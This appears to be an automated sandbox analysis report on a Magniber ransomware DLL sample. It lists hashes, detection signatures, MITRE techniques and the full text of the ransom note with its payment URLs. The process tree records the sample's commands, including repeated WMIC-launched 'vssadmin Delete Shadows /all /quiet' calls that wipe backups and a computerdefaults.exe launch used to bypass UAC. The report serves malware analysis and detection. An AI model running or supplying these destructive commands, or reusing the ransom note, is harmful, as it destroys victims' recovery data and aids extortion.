magniber | 0c77b9e8d6fab41fcef61741b7c1676348d874293ef2a1c8463fb2ff6616756d

Analysis

max time kernel
2s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
11-12-2024 15:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118.dll
Size

20KB
MD5

e22903f461b4ba138bf4cfaee0062c9a
SHA1

23f785def95f9fd88e7204d276adc0a11715807d
SHA256

0c77b9e8d6fab41fcef61741b7c1676348d874293ef2a1c8463fb2ff6616756d
SHA512

f218ad91ac09f084ff2fa0dd2ab621b0b47e986962f410a13b84d8b017c21c31d129f85a067d77465f6c860899a7f56eb9d7a78608ca79156fd506b4fe146c5b
SSDEEP

384:Ja2iKL1YmLf0r4ZNxBz8E/NOibLm/V4pP/IQd2BQLE6AKFd19t/aSccuo:J3HLpf0EZOoOibLQH06QLE6ASjt/d

Score

10^/10

magniber defense_evasion execution impact ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://629824a0e2742e5066qbvpseec.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/qbvpseec Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://629824a0e2742e5066qbvpseec.gosmark.space/qbvpseec http://629824a0e2742e5066qbvpseec.ourunit.xyz/qbvpseec http://629824a0e2742e5066qbvpseec.topsaid.site/qbvpseec http://629824a0e2742e5066qbvpseec.iecard.top/qbvpseec Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://629824a0e2742e5066qbvpseec.m647u2xsjtlfyzuevlxjiiwjsg2btyhmbxbjz4in4hm76u6hjzc62wad.onion/qbvpseec

http://629824a0e2742e5066qbvpseec.gosmark.space/qbvpseec

http://629824a0e2742e5066qbvpseec.ourunit.xyz/qbvpseec

http://629824a0e2742e5066qbvpseec.topsaid.site/qbvpseec

http://629824a0e2742e5066qbvpseec.iecard.top/qbvpseec

Signatures

Detect magniber ransomware 1 IoCs

resource	yara_rule
behavioral2/memory/1920-2-0x000001C27D7D0000-0x000001C27DE02000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber
Magniber family
magniber

Process spawned unexpected child process 50 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2844	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4256	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	276	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4332	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4048	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4340	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5204	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5360	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5328	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5764	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5740	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2208	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1776	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	884	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5784	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6076	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5328	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3816	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5812	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3568	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	720	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5328	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3816	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5236	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5984	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6132	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5428	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4000	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1608	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5984	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2356	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2704	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4856	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4240	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5948	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2884	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5672	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6072	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4812	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	304	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	964	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5416	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4984	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1248	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6084	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5544	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3568	4912	cmd.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3164	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3276	4912	vssadmin.exe	88
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6120	4912	vssadmin.exe	88

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Suspicious use of SetThreadContext 13 IoCs

description	pid	Process	procid_target
PID 1920 set thread context of 2996	1920	rundll32.exe	51
PID 1920 set thread context of 3068	1920	rundll32.exe	52
PID 1920 set thread context of 2684	1920	rundll32.exe	53
PID 1920 set thread context of 3428	1920	rundll32.exe	56
PID 1920 set thread context of 3556	1920	rundll32.exe	57
PID 1920 set thread context of 3768	1920	rundll32.exe	58
PID 1920 set thread context of 3860	1920	rundll32.exe	59
PID 1920 set thread context of 3924	1920	rundll32.exe	60
PID 1920 set thread context of 4024	1920	rundll32.exe	61
PID 1920 set thread context of 4196	1920	rundll32.exe	62
PID 1920 set thread context of 4152	1920	rundll32.exe	74
PID 1920 set thread context of 3968	1920	rundll32.exe	76
PID 1920 set thread context of 232	1920	rundll32.exe	81

Interacts with shadow copies 3 TTPs 30 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
4340	vssadmin.exe
4240	vssadmin.exe
5236	vssadmin.exe
5984	vssadmin.exe
5428	vssadmin.exe
4812	vssadmin.exe
3568	vssadmin.exe
2884	vssadmin.exe
5360	vssadmin.exe
6076	vssadmin.exe
2704	vssadmin.exe
1248	vssadmin.exe
3164	vssadmin.exe
2208	vssadmin.exe
884	vssadmin.exe
4984	vssadmin.exe
6120	vssadmin.exe
2844	vssadmin.exe
720	vssadmin.exe
304	vssadmin.exe
3276	vssadmin.exe
276	vssadmin.exe
4856	vssadmin.exe
5948	vssadmin.exe
4048	vssadmin.exe
1776	vssadmin.exe
5784	vssadmin.exe
5812	vssadmin.exe
1608	vssadmin.exe
6084	vssadmin.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
4408	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1920	rundll32.exe
1920	rundll32.exe

Suspicious behavior: MapViewOfSection 13 IoCs

pid	Process
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe
1920	rundll32.exe

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2996
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4084
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4416
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3228
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1112
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3004

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3068
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5280
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5292
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5652
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:284
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1616

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
PID:2684
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1044
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3164
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3976
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:276
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5652

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3428
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\e22903f461b4ba138bf4cfaee0062c9a_JaffaCakes118.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:1920
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5584
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:5244
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:5020
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:4588
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:1580
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5804
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1404
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5448
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4164
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3556
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3100
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1248
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5388
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3932
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5308

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3768
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5304
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:964
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5308
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5128
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4856

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:3860
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5908
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5984
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5972

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3924
- C:\Windows\System32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4408
- C:\Windows\System32\cmd.exe
  cmd /c "start http://629824a0e2742e5066qbvpseec.gosmark.space/qbvpseec^&2^&44436918^&80^&327^&2219041"
  2⤵
  PID:1124
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://629824a0e2742e5066qbvpseec.gosmark.space/qbvpseec&2&44436918&80&327&2219041
    3⤵
    PID:2724
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff4aae46f8,0x7fff4aae4708,0x7fff4aae4718
      4⤵
      PID:4852
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
      4⤵
      PID:4076
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
      4⤵
      PID:1800
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:8
      4⤵
      PID:3964
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1
      4⤵
      PID:4796
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
      4⤵
      PID:3500
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4664 /prefetch:1
      4⤵
      PID:5904
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
      4⤵
      PID:4856
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:1
      4⤵
      PID:1248
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
      4⤵
      PID:1936
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8
      4⤵
      PID:5480
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8
      4⤵
      PID:5880
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
      4⤵
      PID:5804
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:1
      4⤵
      PID:3976
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:1
      4⤵
      PID:5536
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,13699773363457989798,14984670261304531163,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5244 /prefetch:1
      4⤵
      PID:5876
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1204
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5012
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2704
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4348
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2616

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:4024

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4196
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4052
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1756
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1344
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4696
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3696

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
PID:4152
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3356
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3916
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4996

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3968
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3632
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5900
